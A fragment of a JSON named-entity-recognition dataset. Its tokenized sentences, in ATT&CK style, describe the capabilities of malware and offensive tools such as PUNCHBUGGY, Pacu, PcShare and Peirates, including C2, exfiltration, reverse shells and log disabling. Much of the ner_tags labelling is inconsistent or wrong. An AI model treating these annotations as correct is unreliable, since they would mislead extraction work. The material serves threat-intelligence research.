"O", "O" ] }, { "tokens": [ "POWRUNER", "can", "execute", "commands", "from", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "use", "WMI", "when", "collecting", "information", "about", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PS1", "can", "use", "an", "XOR", "key", "to", "decrypt", "a", "PowerShell", "loader", "and", "payload", "binary." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PS1", "can", "inject", "its", "payload", "DLL", "Into", "memory." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PS1", "is", "distributed", "as", "a", "set", "of", "encrypted", "files", "and", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CostaBricks", "can", "download", "additional", "payloads", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "PS1", "can", "utilize", "a", "PowerShell", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PULSECHECK", "can", "base-64", "encode", "encrypted", "data", "sent", "through", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PULSECHECK", "can", "use", "Unix", "shell", "script", "for", "command", "execution." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "PULSECHECK", "can", "check", "HTTP", "request", "headers", "for", "a", "specific", "backdoor", "key", "and", "if", "found", "will", "output", "the", "result", "of", "the", "command", "in", "the", "variable", "`HTTP_X_CMD.`" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "PULSECHECK", "is", "a", "web", "shell", "that", "can", "enable", "command", "execution", "on", "compromised", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "establish", "using", "a", "AppCertDLLs", "Registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "PUNCHBUGGY", "has", "Gzipped", "information", "and", "saved", "it", "to", "a", "random", "temp", "file", "before", "exfil." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "has", "used", "PowerShell", "to", "decode", "base64-encoded", "assembly." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "delete", "files", "written", "to", "disk." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "download", "additional", "files", "and", "payloads", "to", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "gather", "user", "names." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PUNCHBUGGY", "has", "saved", "information", "to", "a", "random", "temp", "file", "before", "exfil." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "mimics", "filenames", "from", "%SYSTEM%\\System32", "to", "hide", "DLLs", "in", "%WINDIR%", "and/or", "%TEMP%." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "has", "hashed", "most", "its", "code's", "functions", "and", "encrypted", "payloads", "with", "base64", "and", "XOR." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "has", "used", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PUNCHBUGGY", "has", "used", "python", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PUNCHBUGGY", "has", "been", "observed", "using", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "load", "a", "DLL", "using", "Rundll32." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PUNCHBUGGY", "can", "gather", "AVs", "registered", "in", "the", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "can", "load", "a", "DLL", "using", "the", "LoadLibrary", "API." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PUNCHBUGGY", "can", "gather", "system", "information", "such", "as", "computer", "names." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHBUGGY", "enables", "remote", "interaction", "and", "can", "obtain", "additional", "code", "over", "HTTPS", "GET", "and", "POST", "requests." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHTRACK", "scrapes", "memory", "for", "properly", "formatted", "payment", "card", "data." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PUNCHTRACK", "aggregates", "collected", "data", "in", "a", "tmp", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "PUNCHTRACK", "is", "loaded", "and", "executed", "by", "a", "highly", "obfuscated", "launcher." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "generate", "SSH", "and", "API", "keys", "for", "AWS", "infrastructure", "and", "additional", "API", "keys", "for", "other", "IAM", "users." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "automatically", "collect", "data,", "such", "as", "CloudFormation", "templates,", "EC2", "user", "data,", "AWS", "Inspector", "reports,", "and", "IAM", "credential", "reports." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "leverages", "the", "AWS", "CLI", "for", "its", "operations." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "enumerate", "IAM", "users,", "roles,", "and", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Org", "O", "O", "O" ] }, { "tokens": [ "Pacu", "leverages", "valid", "cloud", "accounts", "to", "perform", "most", "of", "its", "operations." ], "ner_tags": [ "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "run", "commands", "on", "EC2", "instances", "using", "AWS", "Systems", "Manager", "Run", "Command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "enumerate", "IAM", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Pacu", "can", "enumerate", "AWS", "infrastructure,", "such", "as", "EC2", "instances." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "retrieve", "secrets", "from", "the", "AWS", "Secrets", "Manager", "via", "the", "enum_secrets", "module." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Pacu", "can", "enumerate", "AWS", "services,", "such", "as", "CloudTrail", "and", "CloudWatch." ], "ner_tags": [ "B-Idus", "O", "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Pacu", "can", "enumerate", "AWS", "storage", "services,", "such", "as", "S3", "buckets", "and", "Elastic", "Block", "Store", "volumes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Pacu", "can", "create", "snapshots", "of", "EBS", "volumes", "and", "RDS", "instances." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "B-HackOrg", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Pacu", "can", "enumerate", "and", "download", "files", "stored", "in", "AWS", "storage", "services,", "such", "as", "S3", "buckets." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Pacu", "can", "allowlist", "IP", "addresses", "in", "AWS", "GuardDuty." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "disable", "or", "otherwise", "restrict", "various", "AWS", "logging", "services,", "such", "as", "AWS", "CloudTrail", "and", "VPC", "flow", "logs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pacu", "can", "set", "up", "S3", "bucket", "notifications", "to", "trigger", "a", "malicious", "Lambda", "function", "when", "a", "CloudFormation", "template", "is", "uploaded", "to", "the", "bucket.", "It", "can", "also", "create", "Lambda", "functions", "that", "trigger", "upon", "the", "creation", "of", "users,", "roles,", "and", "groups." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "collect", "CloudTrail", "event", "histories", "and", "CloudWatch", "logs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pacu", "can", "enumerate", "AWS", "security", "services,", "including", "WAF", "rules", "and", "GuardDuty", "detectors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Pacu", "can", "create", "malicious", "Lambda", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Once", "inside", "a", "Virtual", "Private", "Cloud,", "Pacu", "can", "attempt", "to", "identify", "DirectConnect,", "VPN,", "or", "VPC", "Peering." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Pacu", "can", "search", "for", "sensitive", "data:", "for", "example,", "in", "Code", "Build", "environment", "variables,", "EC2", "user", "data,", "and", "Cloud", "Formation", "templates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Pandora", "can", "use", "CVE-2017-15303", "to", "disable", "Windows", "Driver", "Signature", "Enforcement", "(DSE)", "protection", "and", "load", "its", "driver." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "use", "DLL", "side-loading", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "use", "CVE-2017-15303", "to", "bypass", "Windows", "Driver", "Signature", "Enforcement", "(DSE)", "protection", "and", "load", "its", "driver." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "load", "additional", "drivers", "and", "files", "onto", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "write", "an", "encrypted", "token", "to", "the", "Registry", "to", "enable", "processing", "of", "remote", "commands." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "has", "the", "ability", "to", "compress", "stings", "with", "QuickLZ." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pandora", "can", "monitor", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "start", "and", "inject", "code", "into", "a", "new", "`svchost`", "process." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Pandora", "has", "the", "ability", "to", "install", "itself", "as", "a", "Windows", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "has", "the", "ability", "to", "encrypt", "communications", "with", "D3DES." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "Pandora", "can", "identify", "if", "incoming", "HTTP", "traffic", "contains", "a", "token", "and", "if", "so", "it", "will", "intercept", "the", "traffic", "and", "process", "the", "received", "command." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pandora", "can", "communicate", "over", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pandora", "has", "the", "ability", "to", "gain", "system", "privileges", "through", "Windows", "services." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Features", "I-Purp", "I-Purp", "O", "I-Tool", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "files." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "delete", "files." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "lists", "of", "files." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "upload", "files." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Pasam", "establishes", "by", "infecting", "the", "Security", "Accounts", "Manager", "(SAM)", "DLL", "to", "load", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "lists", "of", "running", "processes." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pasam", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "information", "such", "as", "hostname", "and", "free", "disk", "space." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pass-The-Hash", "Toolkit", "can", "perform", "pass", "the", "hash." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "has", "used", "RSA", "encrypted", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "can", "encrypt", "data", "on", "victim's", "machines", "using", "RSA", "and", "AES", "algorithms", "in", "order", "to", "extort", "a", "ransom", "payment", "for", "decryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "can", "remove", "its", "log", "file", "from", "disk." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "has", "designated", "machines", "in", "the", "compromised", "network", "to", "serve", "as", "reverse", "proxy", "pivot", "points", "to", "channel", "communications", "with", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "has", "sent", "its", "public", "key", "to", "the", "C2", "server", "over", "TCP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "can", "stop", "the", "MS", "SQL", "service", "at", "the", "end", "of", "the", "encryption", "process", "to", "release", "files", "locked", "by", "the", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "has", "the", "ability", "to", "gather", "the", "hostname", "of", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pay2Key", "can", "identify", "the", "IP", "and", "MAC", "addresses", "of", "the", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "created", "the", "`HKCU\\\\Software\\\\Classes\\\\CLSID\\\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\\\InprocServer32`", "Registry", "key", "for", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "can", "collect", "files", "and", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "decrypted", "its", "strings", "by", "applying", "a", "XOR", "operation", "and", "a", "decompression", "using", "a", "custom", "implemented", "LZM", "algorithm." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PcShare", "has", "been", "encrypted", "with", "XOR", "using", "different", "32-long", "Base16", "strings", "and", "compressed", "with", "LZW", "algorithm." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PcShare", "can", "upload", "files", "and", "information", "from", "a", "compromised", "host", "to", "its", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "deleted", "its", "files", "and", "components", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "used", "an", "invalid", "certificate", "in", "attempt", "to", "appear", "legitimate." ], "ner_tags": [ "B-Time", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "the", "ability", "to", "capture", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PcShare", "has", "been", "named", "`wuauclt.exe`", "to", "appear", "as", "the", "legitimate", "Windows", "Update", "AutoUpdate", "Client." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "can", "delete", "its", "persistence", "mechanisms", "from", "the", "registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "used", "a", "variety", "of", "Windows", "API", "functions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "can", "obtain", "a", "list", "of", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PcShare", "payload", "has", "been", "injected", "into", "the", "`logagent.exe`", "and", "`rdpclip.exe`", "processes." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "PcShare", "can", "search", "the", "registry", "files", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "used", "`rundll32.exe`", "for", "execution." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PcShare", "can", "take", "screen", "shots", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "can", "obtain", "the", "proxy", "settings", "of", "a", "compromised", "machine", "using", "`InternetQueryOptionA`", "and", "its", "IP", "address", "by", "running", "`nslookup", "myip.opendns.comresolver1.opendns.com\\r\\n`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "PcShare", "can", "capture", "camera", "video", "as", "part", "of", "its", "collection", "process." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PcShare", "has", "used", "HTTP", "for", "C2", "communication." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PcShare", "can", "execute", "`cmd`", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pcexter", "has", "been", "distributed", "and", "executed", "as", "a", "DLL", "file", "named", "Vspmsg.dll", "via", "DLL", "side-loading." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SecTeam" ] }, { "tokens": [ "Pcexter", "can", "upload", "files", "from", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Pcexter", "can", "upload", "stolen", "files", "to", "OneDrive", "storage", "accounts", "via", "HTTP", "`POST`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pcexter", "has", "the", "ability", "to", "search", "for", "files", "in", "specified", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "use", "stolen", "service", "account", "tokens", "to", "perform", "its", "operations.", "It", "also", "enables", "adversaries", "to", "switch", "between", "valid", "service", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "use", "stolen", "service", "account", "tokens", "to", "perform", "its", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "query", "the", "query", "AWS", "and", "GCP", "metadata", "APIs", "for", "secrets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "list", "AWS", "S3", "buckets." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "query", "the", "Kubernetes", "API", "for", "secrets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "use", "`kubectl`", "or", "the", "Kubernetes", "API", "to", "run", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "enumerate", "Kubernetes", "pods", "in", "a", "given", "namespace." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "dump", "the", "contents", "of", "AWS", "S3", "buckets.", "It", "can", "also", "retrieve", "service", "account", "tokens", "from", "kOps", "buckets", "in", "Google", "Cloud", "Storage", "or", "S3." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "deploy", "a", "pod", "that", "mounts", "its", "node’s", "root", "file", "system,", "then", "execute", "a", "command", "to", "create", "a", "reverse", "shell", "on", "the", "node." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "gain", "a", "reverse", "shell", "on", "a", "host", "node", "by", "mounting", "the", "Kubernetes", "hostPath." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Peirates", "can", "initiate", "a", "port", "scan", "against", "a", "given", "IP", "address." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Peirates", "gathers", "Kubernetes", "service", "account", "tokens", "using", "a", "variety", "of", "techniques." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "encrypt", "communications", "using", "the", "BlowFish", "algorithm", "and", "a", "symmetric", "key", "exchanged", "with", "Diffie", "Hellman." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Time", "B-HackOrg" ] }, { "tokens": [ "Penquin", "can", "use", "Cron", "to", "create", "periodic", "and", "pre-scheduled", "background", "jobs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "has", "encrypted", "strings", "in", "the", "binary", "for", "obfuscation." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "execute", "the", "command", "code", "<code>do_upload</code>", "to", "send", "files", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "delete", "downloaded", "executables", "after", "running", "them." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "use", "the", "command", "code", "<code>do_vslist</code>", "to", "send", "file", "names,", "size,", "and", "status", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "remove", "strings", "from", "binaries." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "execute", "the", "command", "code", "<code>do_download</code>", "to", "retrieve", "remote", "files", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "add", "the", "executable", "flag", "to", "a", "downloaded", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { 